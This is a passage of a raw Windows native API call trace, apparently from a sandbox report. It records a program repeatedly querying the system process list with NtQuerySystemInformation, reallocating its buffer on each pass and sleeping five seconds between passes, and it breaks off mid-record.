NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0136.735] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0136.735] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0136.735] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0136.736] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0136.738] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0136.738] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0136.751] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0136.751] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0136.752] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0136.752] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0136.752] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0136.755] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0136.755] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0136.766] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0136.766] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0136.766] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0136.767] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0136.767] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0136.769] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0136.770] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0136.781] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0136.781] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0136.782] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0136.782] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0136.782] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0136.784] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0136.785] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0136.797] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0136.797] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0136.797] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0136.798] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0136.798] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0136.800] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0136.800] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0136.813] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0136.814] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0136.814] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0136.814] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0136.814] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0136.816] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0136.817] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0136.828] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0136.833] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0136.833] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0136.833] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0136.833] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0136.836] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0136.836] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0136.844] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0136.844] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0136.844] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0136.845] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0136.845] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0136.847] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0136.847] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0136.860] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0136.860] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0136.861] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0136.861] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0136.861] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0136.863] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0136.863] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0136.875] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0136.875] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0136.876] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0136.876] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0136.876] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0136.878] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0136.878] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0136.895] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0136.895] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0136.895] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0136.896] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0136.898] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0136.899] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0136.900] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0136.906] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0136.906] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0136.906] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0136.907] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0136.907] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0136.909] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0136.909] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0136.922] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0136.923] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0136.925] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0136.925] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0136.925] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0136.927] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0136.928] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0136.940] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0136.940] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0136.941] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0136.941] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0136.942] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0136.944] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0136.944] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0136.955] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0136.955] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0136.956] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0136.956] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0136.956] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0136.958] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0136.959] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0136.968] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0136.969] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0136.969] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0136.969] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0136.970] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0136.972] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0136.972] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0136.986] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0136.986] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0136.987] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0136.987] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0136.987] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0136.989] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0136.990] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0137.000] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0137.000] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0137.000] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0137.000] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0137.001] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0137.002] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0137.003] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0137.015] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0137.015] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0137.016] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0137.016] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0137.016] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0137.019] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0137.019] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0137.032] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0137.032] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0137.033] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0137.033] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0137.033] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0137.036] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0137.037] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0137.046] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0137.047] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0137.047] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0137.047] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0137.048] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0137.050] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0137.050] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0137.062] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0137.062] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, 